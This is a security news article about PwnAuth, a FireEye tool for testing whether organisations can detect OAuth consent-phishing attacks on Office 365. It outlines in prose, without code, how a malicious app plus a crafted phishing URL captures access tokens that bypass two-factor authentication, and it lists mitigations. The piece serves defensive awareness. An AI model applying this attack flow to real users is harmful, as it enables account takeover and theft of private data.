Organizations devote time and resources to stop users from giving away credentials in a spear phishing attempt and to respond quickly in case of such an attack. In contrast, less attention is paid to OAuth-based attacks, a lesser known form of social engineering. A new tool from FireEye gives organizations a testing platform for OAuth abuse.
OAuth 2.0 is a widely used authorization protocol that allows third-party applications to obtain limited access to a given web service. Attackers can use social engineering techniques to trick victims into authorizing malicious third-party applications to access their account, which gives them access to user data without having to steal user credentials.
Known as PwnAuth, the web application framework gives organizations a better understanding of how well they can detect and respond to OAuth abuse campaigns. Penetration testers can use the easy-to-use UI to manage malicious OAuth applications, store collected OAuth tokens, and interact with API resources. PwnAuth was released to increase awareness and detection capabilities as well as to provide countermeasures for defenders.
“OAuth abuse attacks are a dangerous and non-traditional phishing technique that attackers can use to gain access to an organization's confidential data,” said Doug Bienstock, a senior consultant at Mandiant, FireEye’s incident response division.
Sites that allow users to log in with accounts on a third-party platform, such as Microsoft, Google, and Facebook, use OAuth. In a scenario where the application accesses the user’s OneDrive account to make it easy to share files, the application requests a specific type of access to the user’s Microsoft account, and APIs define the scope. Authorization is handled by Microsoft.
Organizations and security professionals can use PwnAuth to test their ability to detect and respond to this new type of attack.
For OAuth abuse, the attacker needs to create a malicious application and a web service that is listening for authorization attempt. Using social engineering methods, such as a specially-crafted URL in the body of a phishing email, the attackers convince the user to grant access to the malicious application. When the user agrees, the attacker obtains the access token, which gives access to the user’s data without a password. Access tokens, once saved, can bypass any two-factor mechanism that may be enabled, Bienstock said. The only way to stop the application from having access to the user account is for the user to manually revoke the application’s permissions.
“Because all victim interaction is on sites owned by the legitimate Resource Provider (e.g. Microsoft), it can be hard for an untrained user to differentiate between a legitimate OAuth application and a malicious one,” Bienstock said.
Last year, a phishing attack targeting Gmail users tricked many users into granting a malicious app named “Google Docs” access to their contact information. It was successful because the email looked like a legitimate Google Docs request to share a document and the prompt to authorize the app was legitimate, as it was in response to an OAuth request.
PwnAuth runs within a Docker container and requires configuring SSL certificates and NGINX (a sample NGINX configuration file is on GitHub). Penetration testers need to first create a Microsoft application and trick potential victims into clicking on, or somehow opening, a specially-crafted URL pointing to the application using the OAuth protocol. This is the action which grants permission to the application. The web service associated with PwnAuth is listening and captures the OAuth tokens, which can be then used to interact with the Microsoft Graph API to access the user data. PwnAuth can be used to test users on any cloud environment as long as the malicious application is an Office 365 application.
Access tokens, once saved, can bypass any two-factor mechanism that may be enabled.
Bienstock released PwnAuth as an open source project and the code is available on GitHub. Currently, there is only a module for O365 applications, although Bienstock plans to add modules for other cloud environments. The user interface and framework are designed to be easily extendable to other API Resources. Bienstock also released an OAuthHunting script for administrators to look for artifacts left behind by malicious OAuth applications in cloud environments. He said scripts to investigate other cloud environments will be added at a later time.
“Organizations and security professionals can use PwnAuth to test their ability to detect and respond to this new type of attack,” Bienstock said.
Mitigations include limiting the potential impact of malicious applications by limiting the API scopes third-party applications can request, disabling third-party apps, whitelisting or blacklisting applications, querying an organization's user base for all consented applications, and logging user consent events. Office 365 also lets administrators block access to third-party applications, record when a user consents to a third-party application, and take action if a malicious app was granted access. Organizations can also add OAuth abuse scenarios to their social engineering programs.
“As we move more services to the cloud, organizations should be careful to lock down third-party application access and ensure that their monitoring and detection strategy covers application consent grants,” Bienstock said.